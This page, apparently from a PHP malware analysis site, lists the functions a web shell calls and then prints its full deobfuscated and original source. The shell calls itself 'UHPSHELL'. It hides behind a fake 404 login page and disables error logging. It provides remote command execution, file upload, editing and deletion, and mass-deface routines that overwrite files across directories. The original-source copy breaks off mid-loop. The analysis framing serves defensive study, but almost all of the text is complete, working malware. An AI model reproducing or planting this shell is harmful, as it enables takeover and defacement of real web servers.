PHP Malware Analysis

Back to list

Filename: uhpun.php

Tags

URLs
Execution
  • system
  • exec
  • passthru
  • shell_exec
Input
  • _GET
  • _POST
  • _FILES
Environment
  • set_time_limit
  • error_reporting
  • php_uname
  • getcwd
  • phpinfo
Files
  • file_get_contents
  • file_put_contents
  • copy

Deobfuscated code

<?php

http_response_code("404");
session_start();
error_reporting(0);
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$uname = 'UHPSHELL';
$pass = '123';
if (!isset($_SESSION['uname']) or $_SESSION['uname'] != $uname) {
    $login = '
<head>
<title>404 Not Found</title>
<style>.input{border:0;color:black;background-color:white;}.inputbtn{border:0;color:white;background-color:white;}</style></head>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<center><form method="POST">
<input type="text" class="input" name="uname">
<input type="text" class="input" name="pass">
<input type="submit" class="inputbtn" name="login">
</form></body></html>';
}
if (isset($_POST['login'])) {
    if ($_POST['uname'] !== $uname || $_POST['pass'] !== $pass) {
    } else {
        $_SESSION['uname'] = $_POST['uname'];
    }
}
if ($_SESSION['uname'] === $uname) {
    ?>
<!DOCTYPE HTML>
<html>
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
<head>
<link rel="shortcut icon" href="https://i.ibb.co/5cKKZGt/received-491178322732265.jpg" type="image/jpg"> 
<body bgcolor="black"><center>
	


<link href="" rel="stylesheet" type="text/json_decode">
<title>~[ UNCROWN HACKERS PHILIPPINES ]~</title>
<style>
	
body{
background-colour: yellow;
}
.e{
	color: black;
	background-color: black;
	
}
.v{
	color: black;
}
#content tr:hover{
background-color: red;
text-shadow:0px 0px 12px #fff;
}
#defacer{
width:300px;
background:black;
border:solid 2px red;
color:lime;
}
#domains{
background:black;
border:2px #15d6c8 solid;
color: blue;
}
.cmd{
	width: 50%;
	border:2px #15d6c8 solid;
	color: lime;
}
#content .first{
background-colour: red;
}
table{
border: 2px #15d6c8 solid;
}
textarea{
width: 80%;
height: 80%;
}
.error{
			color: red;
			font-size: 30;
}
.success{
			color: #00FF49;
			font-size: 30;
}
a{
color:red;
text-decoration: iceland;
}
a:hover{
color:red;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea,button{
border: 2px #15d6c8 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</head>
<body>
	</center>
	</center>
<font color="white" size="2">Uname: </font><font color="red" size="2"><?php 
    echo php_uname();
    ?>
</font>
<br>
<font color="white" size="2">Whoami: </font><font color="red" size="2"><?php 
    if (function_exists("system")) {
        system("whoami");
    } elseif (function_exists("passthru")) {
        passthru("whoami");
    } elseif (function_exists("exec")) {
        exec("whoami");
    } elseif (function_exists("shell_exec")) {
        shell_exec("whoami");
    }
    ?>
</font>
 <center> <center>
     <center><br><br>
    	<a href="<?php 
    echo $_SERVER['PHP_SELF'];
    ?>"><img border='0' alt="UHP Logo" src='https://i.ibb.co/5cKKZGt/received-491178322732265.jpg' height='290' width='300'></a>
      </center>
   <h3><font color="white">UNCROWN HACKERS PHILIPPINES </h3>
    <div class="greetings">
  <!!!--<a href="<?php 
    echo $_SERVER['PHP_SELF'];
    ?>"> * UNCROWN HACKERS PHILIPPINES * </a>
 </div><br>
       <br><br>
    
   <br>
 <font size="5"><a href="?masszone">Mass Zone - H</a> ~ <a href="?massdeface">Mass Deface</a> ~ <a href="?massbackdoor">Mass Backdoor</a> ~ <a href="?phpinfo">PHP Info</a></font>
<?php 
    $notavail = "<font color='red'><h1>Available Soon!</h1></font>\n<br>\n<font color='red' size='6'>\nFor more updates do pm me.\n<br>\n</font>\n<br>\n<button><a href='https://www.facebook.com/johndelacruzcw'>Contact</a></button>\n";
    if (!empty($_POST['cmd'])) {
        exec($cmd, $b);
        $status = "Executed!";
    }
    if (isset($_GET['path'])) {
        $path = $_GET['path'];
    } else {
        $path = getcwd();
    }
    $path = str_replace('\\', '/', $path);
    $paths = explode('/', $path);
    if (isset($_GET['path'])) {
        $path = $_GET['path'];
    } else {
        $path = getcwd();
    }
    $path = str_replace('\\', '/', $path);
    $paths = explode('/', $path);
    if ($_POST['_upl'] == "Upload") {
        $fname = $_FILES['file']['name'];
        $fdir = $_POST['dir'];
        $total = $_POST['patch'] . '/' . $fname;
        if (@copy($_FILES['file']['tmp_name'], $path . '/' . $total)) {
            $fname = $_FILES['file']['name'];
            //	echo $_FILES['file']['tmp_name'];
            //		$runs = $path.'/'.$fname;
            $success = "Uploaded!";
            $status = $success;
        } else {
            $failed = 'Error!';
            $status = $failed;
        }
    }
    echo "<table width=\"770\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n<tr><td>Path : ";
    foreach ($paths as $id => $pat) {
        if ($pat == '' && $id == 0) {
            $a = true;
            echo "<a href=\"?path=/\">/</a>";
            continue;
        }
        if ($pat == '') {
            continue;
        }
        echo "<a href=\"?path=";
        for ($i = 0; $i <= $id; $i++) {
            echo "{$paths[$i]}";
            if ($i != $id) {
                echo "/";
            }
        }
        echo '">' . $pat . '</a>/';
        if (function_exists('opendir')) {
            if ($opendir = opendir($path)) {
                while (($readdir = readdir($opendir)) !== false) {
                    $scandir[] = $readdir;
                }
                closedir($opendir);
            }
            sort($scandir);
        } else {
            $scandir = scandir($path);
        }
    }
    if ($_POST["path"] && $_POST["chmods"]) {
        $chmods = $_POST["chmods"];
        chmod($_POST["path"], $chmods);
        if (function_exists("system")) {
            system("chmod " . $chmods . " " . $_POST["path"]);
        } elseif (function_exists("passthru")) {
            passthru("chmod " . $chmods . " " . $_POST["path"]);
        } elseif (function_exists("exec")) {
            exec("chmod " . $chmods . " " . $_POST["path"]);
        } elseif (function_exists("shell_exec")) {
            shell_exec("chmod " . $chmods . " " . $_POST["path"]);
        }
        $status = "Permission Changed!";
    }
    if ($_POST['ndir'] && $_POST['path']) {
        $ndir = $_POST["ndir"];
        mkdir($_POST['path'] . '/' . $ndir);
        echo "<div class='success'>";
        $status = "Directory Saved!";
        echo "</div>";
    }
    if ($_POST['code'] && $_POST['path']) {
        $a = $_POST['code'];
        $file = @fopen($_POST['path'] . '/' . $_POST['file'], 'w');
        @fwrite($file, $a);
        @fclose($file);
        echo "<div class='success'>";
        $status = "File Created!";
        echo "</div>";
    } else {
    }
    if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
        if ($_POST['type'] == 'dir') {
            if (rmdir($_POST['path'])) {
                echo "<div class='success'>";
                $status = 'Deleted!';
                echo "</div>";
            } else {
                echo "<div class='error'>";
                $status = "Error!";
                echo "</div>";
            }
        } elseif ($_POST['type'] == 'file') {
            if (unlink($_POST['path'])) {
                echo "<div class='success'>";
                $status = 'Deleted!';
                echo "</div>";
            } else {
                echo "<div class='error'>";
                $status = 'Error!';
                echo "</div>";
            }
        }
    }
    if (isset($_POST['path']) && isset($_POST['newname'])) {
        if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
            $status = 'Renamed! ';
        } else {
            $status = 'Error!';
        }
    }
    if (isset($_POST['src'])) {
        $fp = fopen($_POST['path'], 'w');
        if (fwrite($fp, $_POST['src'])) {
            echo "<div class='success'>";
            $status = 'Saved!';
            echo "</div>";
        } else {
            echo "<div clas='error'>";
            $status = 'Error!';
            echo "</div>";
        }
        fclose($fp);
    }
    if ($status === "Error!") {
        if (!empty($status)) {
            echo "<div class='error'>";
            echo "Status: {$status}";
            echo "</div>";
        }
    } else {
        if (!empty($status)) {
            echo "<div class='success'>";
            echo "Status: {$status}";
            echo "</div>";
        }
    }
    echo "</p>";
    if (isset($_POST["path"]) && $_POST["newf"] == "folder") {
        echo '<form method="POST">
<label>Directory Name: </label>
<input type="hidden" name="path" value="' . $path . '">
<input type="text" name="ndir"/>
<input type="submit" name="save" value="Save!"/>
</form>';
    } elseif ($_POST["path"] && $_POST["opt"] == "chmod") {
        $chmodper = $_POST["chmodper"];
        echo '<form method="POST">
<label>Chmod: </label>
<input type="hidden" name="path" value="' . $path . '">
<input type="text" name="chmods" value="' . $chmodper . '"/>
<input type="submit" name="save" value="Save!"/>
</form>';
    } elseif ($_POST['opt'] == 'rename') {
        if ($_POST["name"] == "") {
            $_POST["name"] = $_POST["newname"];
        }
        echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
 
<input type="submit" value="Save" />
</form>';
        echo "<br/>";
    } else {
    }
    ?>
</td></tr><tr><td><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
<input type="hidden" name="path" value="<?php 
    echo $path;
    ?>">
<input type="hidden" name="dir" value="<?php 
    echo $dir;
    ?>">
<input type="file" class="" name="file" size="50">
 
<input name="_upl" type="submit" class="btn" id="_upl" value="Upload"></form>
<?php 
    $status;
    ?>

</td></tr>
<td><?php 
    echo '
<form method="POST">
Execute: <input name="cmd" type="text" size="20" />
<input type="hidden" name="path" value="' . $path . '">
 
<input type="submit" name="run" value="Run" />
</form>';
    ?></td></table><br/>
<?php 
    if (isset($_POST["path"]) && $_POST["newf"] == "file") {
        echo '<form method="POST">
<label for="input">Filename: </label>
<input id="input"type="text" name="file" placeholder="">
<br>
<br>
<input type="hidden" name="path" value="' . $path . '">
<textarea cols=80 class="textarea" rows=20 name="code" placeholder="">
</textarea><br> <input type="submit"  name="Save" value="Save">
</form>';
    } elseif ($_POST['opt'] == 'edit') {
        $fname = $_POST["name"];
        echo "<br/>\nFilename: <font color='red'>{$fname}</font>\n</br><br/>\n<center>\n<form method='POST'>\n<input name='name' type='hidden' value='{$fname}'/>";
        echo '
<textarea cols=80 class="textarea" rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<br/>
<input type="submit" value="Save" />
</form>';
        echo "<br/></center>";
    } elseif (isset($_GET["phpinfo"])) {
        echo phpinfo();
    } elseif (isset($_GET["masszone"])) {
        echo $notavail;
    } elseif (isset($_POST["cmd"]) && $_POST["run"] && $_POST["path"]) {
        echo "<div class='cmd'>\n<pre>";
        $cmd = $_POST["cmd"];
        system("cd {$path} && {$cmd}");
        echo "</div>";
    } elseif (isset($_GET["massdeface"])) {
        echo "<center><form method='POST'>";
        echo "<h1><font color='red'>Mass Deface</font></h1>";
        echo "<font color='white'>Target Folder</font><br>\n<input cols='10' rows='10' type='text' style='color:lime;background-color:#000000;' name='base_dir' value='" . getcwd() . "'><br><br>";
        echo "<font color='white'>Name of File</font><br><input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='filena' value='mikey.txt'><br><br>";
        echo "<font color='white'>Script Deface</font><br><textarea cols='25' rows='8' style='color:lime;background-color:#000000;' name='index'></textarea><br>";
        echo "<input type='submit' value='Mass !!!'></form></center>";
        if (isset($_POST['base_dir'])) {
            if (!file_exists($_POST['base_dir'])) {
                die($_POST['base_dir'] . " Not Found !<br>");
            }
            if (!is_dir($_POST['base_dir'])) {
                die($_POST['base_dir'] . " Is Not A Directory !<br>");
            }
            @chdir($_POST['base_dir']) or die("Cannot Open Directory");
            $files = @scandir($_POST['base_dir']) or die("Fuck u -_- <br>");
            foreach ($files as $file) {
                if ($file != "." && $file != ".." && @filetype($file) == "dir") {
                    $index = getcwd() . "/" . $file . "/" . $_POST['filena'];
                    if (file_put_contents($index, $_POST['index'])) {
                        echo "<hr color='lime'>>> <font color='lime'>{$index}    </font><font color='lime'>(✓)</font>";
                    }
                }
            }
        }
    } elseif (isset($_GET["defall"])) {
        echo "<center><form method='POST'>";
        echo "<h1><font color='red'>Deface All Files</font></h1>";
        echo "<font color='white'>Target Folder</font><br>\n<input cols='10' rows='10' type='text' style='color:lime;background-color:#000000;' name='current_dir' value='" . getcwd() . "'><br><br>";
        echo "<font color='white'>Script Deface</font><br><textarea cols='25' rows='8' style='color:lime;background-color:#000000;' name='index'></textarea><br>";
        echo "<input type='submit' value='Mass !!!'></form></center>";
        if (isset($_POST['current_dir'])) {
            if (!file_exists($_POST['current_dir'])) {
                die("<font color='red'><hr>" . $_POST['current_dir'] . " Not Found !<br>");
            }
            if (!is_dir($_POST['current_dir'])) {
                die("<font color='red'><hr>" . $_POST['current_dir'] . " Is Not A Directory !</font><br>");
            }
            @chdir($_POST['current_dir']) or die("<font color='red'><hr>Cannot Open Directory</font>");
            $dirs = @scandir($_POST['current_dir']) or die("<font color='red'><hr>Permission Denied!</font><br>");
            //$files = @scandir ($_POST['current_dir']) or die ("<font color='red'><hr>"."Permission Denied!</font><br>");
            //$file = "wew.php";
            foreach ($dirs as $dir) {
                if ($dir != "." && $dir != ".." && @filetype($dir) == "dir") {
                    //$indx = getcwd ()."/".$dir."/".$file;
                    $scandir = scandir(getcwd() . "/" . $dir);
                    foreach (array_unique($scandir) as $file) {
                        if (!is_file(getcwd() . "/" . $dir . "/" . $file)) {
                            continue;
                        }
                        $indx = getcwd() . "/" . $dir . "/" . $file;
                        if (file_put_contents($indx, $_POST['index'])) {
                            echo "<hr color='lime'>>> <font color='lime'>{$indx}    </font><font color='lime'>(✓)</font>";
                        }
                    }
                }
            }
        }
    }
    if (isset($_GET["massbackdoor"])) {
        echo $notavail;
    } else {
        ?>
<div id="content"><table width="800" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>[+] Files/Folder [+]</SCA></center></td>
<td><center>[+] Size [+]</SCA></center></td>
<td><center>[+] Permission [+]</peller></center></td>
<td><center>[+] Modify [+]</SCA></center></td>
</tr><tr>
	
<?php 
        $pathback = dirname("?path={$path}") . PHP_EOL;
        echo "<tr><td><a href='{$pathback}'>..</a></td><center><td><center>--</center></td>\n<td><center>--</center></td>\n<td><center><form method='post'><input type='hidden' name='path' value='{$path}'><input type='hidden' name='newf' value='file'><input type='submit' value='NewFile'></form>\n<form method='post'><input type='hidden' name='path' value='{$path}'>\n<input type='hidden' name='newf' value='folder'><input type='submit' value='NewDirectory'>\n</form></center></td>\n</tr>";
        foreach (array_unique($scandir) as $dir) {
            if (!is_dir($path . '/' . $dir) || $dir == '.' || $dir == '..') {
                continue;
            }
            $size = filesize($path . '/' . $dir) / 1024;
            $size = round($size, 3);
            if ($size >= 1024) {
                $size = round($size / 1024, 2) . ' MB';
            } else {
                $size .= ' KB';
                //echo $size;
            }
            echo '
<td><a href="?path=' . $path . '/' . $dir . '">' . $dir . '</a></td>
<center>';
            if (is_writable($path . '/' . $dir)) {
                echo "<font color=\"red\" size=\"2\">";
            } elseif (!is_readable($path . '/' . $dir)) {
                echo "<font color=\"white\" size=\"2\">";
            }
            //echo perms($path.'/'.$dir);
            if (is_writable($path . '/' . $dir) || !is_readable($path . '/' . $dir)) {
                echo "</font>";
            }
            echo "\n<td><center><font color=\"white\">--</font></center></td>";
            $fpermi = substr(sprintf('%o', fileperms("{$path}/{$file}")), -4);
            echo "\n<td><center><font color='yellow'>{$fpermi}</font></center></td>\n";
            echo '
<td><center>
<form method="POST" action="?option&path=' . $path . '">
<select name="opt">
<option value=""> Menu </option>
<option value="delete">[+] Delete [+]</option>
<option value="chmod">[+] Chmod [+]</option>
<option value="rename">[+] Rename [+]</option>
</select>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="chmodper" value="' . $fpermi . '">
<input type="hidden" name="name" value="' . $dir . '">
<input type="hidden" name="path" value="' . $path . '/' . $dir . '">
<input type="submit" value=">>">
</form>
</center></td><tr>';
        }
        echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
        foreach (array_unique($scandir) as $file) {
            if (!is_file($path . '/' . $file)) {
                continue;
            }
            $size = filesize($path . '/' . $file) / 1024;
            $size = round($size, 3);
            if ($size >= 1024) {
                $size = round($size / 1024, 2) . ' MB';
            } else {
                $size .= ' KB';
                //echo $size;
            }
            echo '<tr>
<td><a href="?filesrc=' . $path . '/' . $file . '&path=' . $path . '">' . $file . '</a></td>
<td><center>' . $size . '</center></td>

';
            $fpermi = substr(sprintf('%o', fileperms("{$path}/{$file}")), -4);
            echo "\n<td><center><font color='yellow'>{$fpermi}</font></center></td>\n";
            echo '<td><center>
<form method="POST" action="?option&path=' . $path . '">
<select name="opt">
<option value=""> Menu </option>
<option value="delete">[+] Delete [+]</option>
<option value="chmod">[+] Chmod [+]</option>
<option value="rename">[+] Rename [+]</option>
<option value="edit">[+] Edit [+]</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="chmodper" value="' . $fpermi . '">
<input type="hidden" name="name" value="' . $file . '">
<input type="hidden" name="path" value="' . $path . '/' . $file . '">
<input type="submit" value=">>">
</form>
</center></td><tr>';
            echo "<div class='cmd-div'>";
            if (!empty($_POST['cmd'])) {
                $cmd = $_POST['cmd'];
                if (function_exists("system")) {
                    system($cmd);
                } elseif (function_exists("passthru")) {
                    passthru($cmd);
                } elseif (function_exists("shell_exec")) {
                    shell_exec($cmd);
                }
                $status = "Executed!";
            }
            if (!empty($b)) {
                echo "<div class='cmd-div'>";
                foreach ($b as $v) {
                    if (!empty($v)) {
                        echo "<pre>";
                        echo "<p>{$v}</p>";
                    } else {
                    }
                }
                echo "</div>";
            }
        }
    }
} else {
    echo $login;
}


Original code

<?php
http_response_code("404");
session_start();
error_reporting(0);
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);

$uname = 'UHPSHELL';
$pass = '123';
if(!isset($_SESSION['uname']) OR $_SESSION['uname'] != $uname){
$login = '
<head>
<title>404 Not Found</title>
<style>.input{border:0;color:black;background-color:white;}.inputbtn{border:0;color:white;background-color:white;}</style></head>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<center><form method="POST">
<input type="text" class="input" name="uname">
<input type="text" class="input" name="pass">
<input type="submit" class="inputbtn" name="login">
</form></body></html>';
 }
if(isset($_POST['login'])){
if($_POST['uname'] !== $uname || $_POST['pass'] !== $pass){
}else{
$_SESSION['uname'] = $_POST['uname'];
}}
if($_SESSION['uname'] === $uname){
?>
<!DOCTYPE HTML>
<html>
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
<head>
<link rel="shortcut icon" href="https://i.ibb.co/5cKKZGt/received-491178322732265.jpg" type="image/jpg"> 
<body bgcolor="black"><center>
	


<link href="" rel="stylesheet" type="text/json_decode">
<title>~[ UNCROWN HACKERS PHILIPPINES ]~</title>
<style>
	
body{
background-colour: yellow;
}
.e{
	color: black;
	background-color: black;
	
}
.v{
	color: black;
}
#content tr:hover{
background-color: red;
text-shadow:0px 0px 12px #fff;
}
#defacer{
width:300px;
background:black;
border:solid 2px red;
color:lime;
}
#domains{
background:black;
border:2px #15d6c8 solid;
color: blue;
}
.cmd{
	width: 50%;
	border:2px #15d6c8 solid;
	color: lime;
}
#content .first{
background-colour: red;
}
table{
border: 2px #15d6c8 solid;
}
textarea{
width: 80%;
height: 80%;
}
.error{
			color: red;
			font-size: 30;
}
.success{
			color: #00FF49;
			font-size: 30;
}
a{
color:red;
text-decoration: iceland;
}
a:hover{
color:red;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea,button{
border: 2px #15d6c8 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</head>
<body>
	</center>
	</center>
<font color="white" size="2">Uname: </font><font color="red" size="2"><?php
echo php_uname();
?>
</font>
<br>
<font color="white" size="2">Whoami: </font><font color="red" size="2"><?php
if(function_exists("system")){
	system("whoami");
	}elseif(function_exists("passthru")){
	passthru("whoami");
	}elseif(function_exists("exec")){
	exec("whoami");
	}elseif(function_exists("shell_exec")){
	shell_exec("whoami");
	}
?>
</font>
 <center> <center>
     <center><br><br>
    	<a href="<?=$_SERVER['PHP_SELF'];?>"><img border='0' alt="UHP Logo" src='https://i.ibb.co/5cKKZGt/received-491178322732265.jpg' height='290' width='300'></a>
      </center>
   <h3><font color="white">UNCROWN HACKERS PHILIPPINES </h3>
    <div class="greetings">
  <!!!--<a href="<?=$_SERVER['PHP_SELF'];?>"> * UNCROWN HACKERS PHILIPPINES * </a>
 </div><br>
       <br><br>
    
   <br>
 <font size="5"><a href="?masszone">Mass Zone - H</a> ~ <a href="?massdeface">Mass Deface</a> ~ <a href="?massbackdoor">Mass Backdoor</a> ~ <a href="?phpinfo">PHP Info</a></font>
<?php
$notavail = "<font color='red'><h1>Available Soon!</h1></font>
<br>
<font color='red' size='6'>
For more updates do pm me.
<br>
</font>
<br>
<button><a href='https://www.facebook.com/johndelacruzcw'>Contact</a></button>
";
if(!empty($_POST['cmd'])){
	exec($cmd,$b);
	$status = "Executed!";
}
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

if( $_POST['_upl'] == "Upload" ){
	$fname = $_FILES['file']['name'];
	$fdir = $_POST['dir'];
	$total = $_POST['patch'].'/'.$fname;
	if(@copy($_FILES['file']['tmp_name'],$path.'/'.$total)){
		$fname = $_FILES['file']['name'];
	//	echo $_FILES['file']['tmp_name'];

//		$runs = $path.'/'.$fname;
		$success = "Uploaded!";
		$status = $success;
		}else{
		$failed = 'Error!';
		$status = $failed;
	}
}

echo '<table width="770" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Path : ';
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
if(function_exists('opendir')) {
	if($opendir = opendir($path)) {
		while(($readdir = readdir($opendir)) !== false) {
			$scandir[] = $readdir;
		}
		closedir($opendir);
	}
	sort($scandir);
} else {
		
	$scandir = scandir($path);
}
}

?>
<?php
if($_POST["path"] && $_POST["chmods"]){
	$chmods = $_POST["chmods"];
	chmod($_POST["path"], $chmods);
	if(function_exists("system")){
	system("chmod ".$chmods." ".$_POST["path"]);
	}elseif(function_exists("passthru")){
	passthru("chmod ".$chmods." ".$_POST["path"]);
	}elseif(function_exists("exec")){
	exec("chmod ".$chmods." ".$_POST["path"]);
	}elseif(function_exists("shell_exec")){
	shell_exec("chmod ".$chmods." ".$_POST["path"]);
	}
	$status = "Permission Changed!";
}
if($_POST['ndir'] && $_POST['path']){
$ndir = $_POST["ndir"];
mkdir($_POST['path'].'/'.$ndir);
echo "<div class='success'>";
$status = "Directory Saved!";
echo "</div>";
}
if($_POST['code'] && $_POST['path']){
$a = $_POST['code'];
$file = @fopen($_POST['path'].'/'.$_POST['file'],'w');
@fwrite($file,$a); @fclose($file);
echo "<div class='success'>";
$status = "File Created!";
echo "</div>";
}else{
}

if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo "<div class='success'>";
$status = 'Deleted!';
echo "</div>";
}else{
echo "<div class='error'>";
$status = "Error!";
echo "</div>";
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo "<div class='success'>";
$status = 'Deleted!';
echo "</div>";
}else{
echo "<div class='error'>";
$status = 'Error!';
echo "</div>";
}
}
}

if(isset($_POST['path']) && isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
$status = 'Renamed! ';
}else{
$status = 'Error!';
}}
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo "<div class='success'>";
$status = 'Saved!';
echo "</div>";
}else{
echo "<div clas='error'>";
$status = 'Error!';
echo "</div>";
}
fclose($fp);
}?>
<?php
if($status === "Error!"){
	if(!empty($status)){
echo "<div class='error'>";
echo "Status: $status";
echo "</div>";
}
}else{
	if(!empty($status)){
echo "<div class='success'>";
echo "Status: $status";
echo "</div>";
}
}
echo "</p>";
if(isset($_POST["path"]) && $_POST["newf"] == "folder"){
echo '<form method="POST">
<label>Directory Name: </label>
<input type="hidden" name="path" value="'.$path.'">
<input type="text" name="ndir"/>
<input type="submit" name="save" value="Save!"/>
</form>';
	}elseif($_POST["path"] && $_POST["opt"] == "chmod"){
	$chmodper = $_POST["chmodper"];
	echo '<form method="POST">
<label>Chmod: </label>
<input type="hidden" name="path" value="'.$path.'">
<input type="text" name="chmods" value="'.$chmodper.'"/>
<input type="submit" name="save" value="Save!"/>
</form>';
	
}elseif($_POST['opt'] == 'rename'){
if($_POST["name"] == ""){
$_POST["name"] = $_POST["newname"];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
 
<input type="submit" value="Save" />
</form>';
echo "<br/>";
}else{}


?>
</td></tr><tr><td><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
<input type="hidden" name="path" value="<?=$path;?>">
<input type="hidden" name="dir" value="<?=$dir;?>">
<input type="file" class="" name="file" size="50">
 
<input name="_upl" type="submit" class="btn" id="_upl" value="Upload"></form>
<?$status;?>

</td></tr>
<td><?php echo'
<form method="POST">
Execute: <input name="cmd" type="text" size="20" />
<input type="hidden" name="path" value="'.$path.'">
 
<input type="submit" name="run" value="Run" />
</form>';?></td></table><br/>
<?php
if(isset($_POST["path"]) && $_POST["newf"] == "file"){
	echo '<form method="POST">
<label for="input">Filename: </label>
<input id="input"type="text" name="file" placeholder="">
<br>
<br>
<input type="hidden" name="path" value="'.$path.'">
<textarea cols=80 class="textarea" rows=20 name="code" placeholder="">
</textarea><br> <input type="submit"  name="Save" value="Save">
</form>';
}elseif($_POST['opt'] == 'edit'){
$fname = $_POST["name"];
echo "<br/>
Filename: <font color='red'>$fname</font>
</br><br/>
<center>
<form method='POST'>
<input name='name' type='hidden' value='$fname'/>";
echo '
<textarea cols=80 class="textarea" rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<br/>
<input type="submit" value="Save" />
</form>';
echo "<br/></center>";
}elseif(isset($_GET["phpinfo"])){
	echo phpinfo();
}elseif(isset($_GET["masszone"])){
		echo $notavail;
}elseif(isset($_POST["cmd"]) && $_POST["run"] && $_POST["path"]){
echo "<div class='cmd'>
<pre>";
$cmd = $_POST["cmd"];
	system("cd $path && $cmd");
	//echo "cd $path && $cmd";
	echo"</div>";
}elseif(isset($_GET["massdeface"])){
echo "<center><form method='POST'>";
echo "<h1><font color='red'>Mass Deface</font></h1>";
echo "<font color='white'>Target Folder</font><br>
<input cols='10' rows='10' type='text' style='color:lime;background-color:#000000;' name='base_dir' value='".getcwd ()."'><br><br>";
echo "<font color='white'>Name of File</font><br><input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='filena' value='mikey.txt'><br><br>";
echo "<font color='white'>Script Deface</font><br><textarea cols='25' rows='8' style='color:lime;background-color:#000000;' name='index'></textarea><br>";
echo "<input type='submit' value='Mass !!!'></form></center>";
 
if (isset ($_POST['base_dir']))
{
        if (!file_exists ($_POST['base_dir']))
                die ($_POST['base_dir']." Not Found !<br>");
 
        if (!is_dir ($_POST['base_dir']))
                die ($_POST['base_dir']." Is Not A Directory !<br>");
 
        @chdir ($_POST['base_dir']) or die ("Cannot Open Directory");
 
        $files = @scandir ($_POST['base_dir']) or die ("Fuck u -_- <br>");
 
        foreach ($files as $file):
                if ($file != "." && $file != ".." && @filetype ($file) == "dir")
                {
                        $index = getcwd ()."/".$file."/".$_POST['filena'];
                        if (file_put_contents ($index, $_POST['index']))
                                echo "<hr color='lime'>>> <font color='lime'>$index    </font><font color='lime'>(✓)</font>";
                }
        endforeach;
}
}elseif(isset($_GET["defall"])){
echo "<center><form method='POST'>";
echo "<h1><font color='red'>Deface All Files</font></h1>";
echo "<font color='white'>Target Folder</font><br>
<input cols='10' rows='10' type='text' style='color:lime;background-color:#000000;' name='current_dir' value='".getcwd ()."'><br><br>";
echo "<font color='white'>Script Deface</font><br><textarea cols='25' rows='8' style='color:lime;background-color:#000000;' name='index'></textarea><br>";
echo "<input type='submit' value='Mass !!!'></form></center>";
 
if (isset ($_POST['current_dir'] )) 
{
        if (!file_exists ($_POST['current_dir']))
                die ("<font color='red'><hr>".$_POST['current_dir']." Not Found !<br>");
  
        if (!is_dir ($_POST['current_dir']))
                die ("<font color='red'><hr>".$_POST['current_dir']." Is Not A Directory !</font><br>");
 
        @chdir ($_POST['current_dir']) or die ("<font color='red'><hr>Cannot Open Directory</font>");
 
        $dirs = @scandir ($_POST['current_dir']) or die ("<font color='red'><hr>"."Permission Denied!</font><br>");
        //$files = @scandir ($_POST['current_dir']) or die ("<font color='red'><hr>"."Permission Denied!</font><br>");
        //$file = "wew.php";
foreach ($dirs as $dir){
				
